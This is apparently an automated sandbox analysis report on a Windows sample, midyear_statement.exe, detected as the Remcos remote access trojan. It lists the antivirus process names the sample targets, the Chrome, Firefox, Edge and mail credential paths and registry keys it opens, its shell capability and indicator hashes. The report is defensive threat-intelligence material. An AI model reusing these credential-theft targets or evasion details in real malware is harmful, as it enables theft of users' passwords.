Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\22
Source: wkrriuhD.pif, 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\511
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, logs.dat.24.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_005C5A34 cpuid

24_2_005C5A34

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_040A5A3C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetLocaleInfoA,	0_2_040AA708
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetLocaleInfoA,	0_2_040AA754
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_040A5B48
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoA,	24_2_1233F8D1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_12382313
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12382036
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_123820C3
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_12382610
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_1238243C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12378404
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_12382543
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_123788ED
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12381F50
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12381F9B
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_12381CD8

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040A9150 GetLocalTime,

0_2_040A9150

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B60D GetComputerNameExW,GetUserNameW,

24_2_1234B60D

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_00401108 GetTimeZoneInformation,

24_2_00401108

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040AB6D0 GetVersionExA,

0_2_040AB6D0

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

24_2_1233BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: \key3.db		24_2_1233BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: ESMTPPassword	28_2_004033F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	28_2_00402DB3
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	28_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 8172, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: cmd.exe

24_2_1233569A

Windows Analysis Report
midyear_statement.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1417015
Product:	CloudBasic
Start time:	13:58:07
Start date:	28.03.2024
Sample:	midyear_statement.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	dd8e3f6ac5c24960b3a69490082c60e1
SHA1:	c5f8aaec5baa571791789dd5fac53e27938dbc29
SHA256:	15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\remcos\logs.dat	data	53F39060C128C092FE1DEDCE56FD722D	211DA2844034599DFD2D5DEEE5289A6ACDCE90A8	2EBF058C161E48889668A5AD8552D488EA9CAA3441E09EBFD23930960806FAD6
C:\Users\Public\Dhuirrkw.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF">), ASCII text, with CRLF line terminators	98CEDD728217C8E88B50667980974A9F	D99A98F1722AEDCB9EE60D08C38CFADE3CB22A3F	5F0DF8D30DF5428164AAABADCD1D8B873186C6E0D5247B157196C32696F28F77
C:\Users\Public\Libraries\Dhuirrkw.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	DD8E3F6AC5C24960B3A69490082C60E1	C5F8AAEC5BAA571791789DD5FAC53E27938DBC29	15DB18392D7BBF15B30E528DB05EC306E00AC3227277D0639064EC3E2BC98C73
C:\Users\Public\Libraries\Null	ASCII text, with CRLF line terminators	E655C6429C1DFBA3509EEA2FC2108EFF	6D8A1F6E74D27B3EB0E07AD8AF02F9DF002462FA	A77B54178E2066FDC29229D4C0B59051CAEDC92E918E037928E185D39AD86316
C:\Users\Public\Libraries\wkrriuhD.pif	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json	JSON data	D3D1956DA737B1B3EF05DA28210D81B7	40287B4136212BFD82AE0388DD3178721926FCDB	0BA354EA36476D11344D1E20DED0C3658FD39B6D436C916AE02FB1E7DC47D742
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	7B390667B7AD392C3A7ECD95310E0D68	F7ED92E360DACA5B2BB3152AFB8A26DD5A408706	E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3luth4im.4e3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imfx2ezv.jpo.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5tomrjh.33x.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\bhv348F.tmp	Extensible storage engine DataBase, version 0x620, checksum 0xbda68b75, page size 32768, DirtyShutdown, Windows version 10.0	4D670AFC0ACDE5EFAFDD756D8D7444E1	3D805BD200DBB8A3E12CC418A663DABA241E6986	87AD9A15E53285B2D2714912F27967B2B24EB75B161920D288D36FC9A807C127
C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
